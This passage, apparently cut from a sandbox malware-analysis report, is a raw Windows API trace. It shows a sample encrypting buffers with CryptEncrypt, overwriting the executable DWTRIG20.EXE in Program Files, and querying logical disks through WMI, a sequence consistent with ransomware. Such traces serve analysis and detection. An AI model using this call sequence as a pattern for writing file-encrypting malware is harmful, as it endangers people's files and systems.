hKey=0xbe1628, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x52f9040*, pdwDataLen=0x6d8ed78*=0x99bb0, dwBufLen=0x99bb0 | out: pbData=0x52f9040*, pdwDataLen=0x6d8ed78*=0x99bb0) returned 1 [0155.435] CryptEncrypt (in: hKey=0xbe1628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35e7b4c*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x35e7b4c*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0155.437] CryptDestroyKey (hKey=0xbe1528) returned 1 [0155.437] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0155.437] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0155.437] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", lpFilePart=0x0) returned 0x3e [0155.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0155.438] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0155.438] GetFileType (hFile=0x320) returned 0x1 [0155.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0155.438] GetFileType (hFile=0x320) returned 0x1 [0155.438] WriteFile (in: hFile=0x320, lpBuffer=0x35e8164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x35e8164*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0155.439] CloseHandle (hObject=0x320) returned 1 [0155.440] CoTaskMemAlloc (cb=0x20c) returned 0x66cc4b0 [0155.440] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66cc4b0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0155.440] CoTaskMemFree (pv=0x66cc4b0) [0155.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0155.440] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0155.441] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0155.441] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0155.441] IUnknown:Release (This=0xb51e34) returned 0x1 [0155.442] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x60248e0) returned 0x0 [0155.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x60248e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0155.442] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60248e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x6025e60) returned 0x0 [0155.442] WbemDefPath:IUnknown:Release (This=0x60248e0) returned 0x0 [0155.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025e60, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x6025e60) returned 0x0 [0155.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025e60, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0155.442] WbemDefPath:IUnknown:AddRef (This=0x6025e60) returned 0x3 [0155.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025e60, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0155.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025e60, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0155.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025e60, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0x66ccb98) returned 0x0 [0155.443] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccb98, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0155.443] WbemDefPath:IUnknown:Release (This=0x66ccb98) returned 0x3 [0155.443] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0155.443] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0155.443] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025e60, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0155.443] WbemDefPath:IUnknown:Release (This=0x6025e60) returned 0x2 [0155.443] WbemDefPath:IUnknown:Release (This=0x6025e60) returned 0x1 [0155.443] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0155.443] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0155.443] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025e60, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x6025e60) returned 0x0 [0155.443] WbemDefPath:IUnknown:AddRef (This=0x6025e60) returned 0x3 [0155.443] WbemDefPath:IUnknown:Release (This=0x6025e60) returned 0x2 [0155.443] WbemDefPath:IWbemPath:SetText (This=0x6025e60, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0155.443] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025e60, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0155.443] WbemDefPath:IWbemPath:GetText (in: This=0x6025e60, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, pszText=0x0) returned 0x0 [0155.443] WbemDefPath:IWbemPath:GetText (in: This=0x6025e60, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0155.443] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025e60, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0155.443] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025e60, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0155.443] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025e60, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0155.443] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025e60, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0155.443] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025e60, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0155.443] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0155.444] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0155.444] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0155.444] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0155.444] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0155.444] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0155.444] IUnknown:Release (This=0xb51e34) returned 0x1 [0155.445] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x6024b20) returned 0x0 [0155.445] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024b20, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0155.445] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024b20, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x6025ed0) returned 0x0 [0155.445] WbemDefPath:IUnknown:Release (This=0x6024b20) returned 0x0 [0155.445] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ed0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x6025ed0) returned 0x0 [0155.445] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ed0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0155.445] WbemDefPath:IUnknown:AddRef (This=0x6025ed0) returned 0x3 [0155.445] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ed0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0155.445] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ed0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0155.445] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ed0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0x66cca38) returned 0x0 [0155.445] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66cca38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0155.445] WbemDefPath:IUnknown:Release (This=0x66cca38) returned 0x3 [0155.445] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0155.445] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0155.445] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ed0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0155.445] WbemDefPath:IUnknown:Release (This=0x6025ed0) returned 0x2 [0155.445] WbemDefPath:IUnknown:Release (This=0x6025ed0) returned 0x1 [0155.446] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0155.446] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0155.446] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025ed0, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x6025ed0) returned 0x0 [0155.446] WbemDefPath:IUnknown:AddRef (This=0x6025ed0) returned 0x3 [0155.446] WbemDefPath:IUnknown:Release (This=0x6025ed0) returned 0x2 [0155.446] WbemDefPath:IWbemPath:SetText (This=0x6025ed0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0155.446] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025ed0, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0155.446] WbemDefPath:IWbemPath:GetText (in: This=0x6025ed0, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0155.446] WbemDefPath:IWbemPath:GetText (in: This=0x6025ed0, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0155.446] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0155.446] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0155.446] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0155.446] IUnknown:Release (This=0xb51e34) returned 0x1 [0155.447] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x6027468) returned 0x0 [0155.447] WbemLocator:IUnknown:QueryInterface (in: This=0x6027468, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0155.447] WbemLocator:IClassFactory:CreateInstance (in: This=0x6027468, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x6024b40) returned 0x0 [0155.447] WbemLocator:IUnknown:Release (This=0x6027468) returned 0x0 [0155.447] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b40, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x6024b40) returned 0x0 [0155.447] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b40, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0155.447] WbemLocator:IUnknown:AddRef (This=0x6024b40) returned 0x3 [0155.447] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b40, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0155.447] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b40, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0155.447] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b40, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0155.447] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0155.447] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0155.447] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b40, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0155.448] WbemLocator:IUnknown:Release (This=0x6024b40) returned 0x2 [0155.448] WbemLocator:IUnknown:Release (This=0x6024b40) returned 0x1 [0155.448] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0155.448] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0155.448] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b40, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: ppvObject=0x6d8ead4*=0x6024b40) returned 0x0 [0155.448] WbemLocator:IUnknown:AddRef (This=0x6024b40) returned 0x3 [0155.448] WbemLocator:IUnknown:Release (This=0x6024b40) returned 0x2 [0155.448] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025ed0, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0155.448] WbemDefPath:IWbemPath:GetText (in: This=0x6025ed0, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0155.448] WbemDefPath:IWbemPath:GetText (in: This=0x6025ed0, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0155.448] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x6024b50) returned 0x0 [0155.448] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6024b50, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x60247c4) returned 0x0 [0156.861] WbemLocator:IUnknown:QueryInterface (in: This=0x60247c4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0xb5b6d4) returned 0x0 [0156.862] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b6d4, pProxy=0x60247c4, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0156.862] WbemLocator:IUnknown:Release (This=0xb5b6d4) returned 0x1 [0156.862] WbemLocator:IUnknown:QueryInterface (in: This=0x60247c4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0xb5b6f4) returned 0x0 [0156.862] WbemLocator:IUnknown:QueryInterface (in: This=0x60247c4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0xb5b6d4) returned 0x0 [0156.862] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b6d4, pProxy=0x60247c4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0156.862] WbemLocator:IUnknown:Release (This=0xb5b6d4) returned 0x2 [0156.862] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x1 [0156.862] CoTaskMemFree (pv=0xbd4a68) [0156.862] WbemLocator:IUnknown:Release (This=0x6024b50) returned 0x0 [0157.010] WbemLocator:IUnknown:QueryInterface (in: This=0x60247c4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: 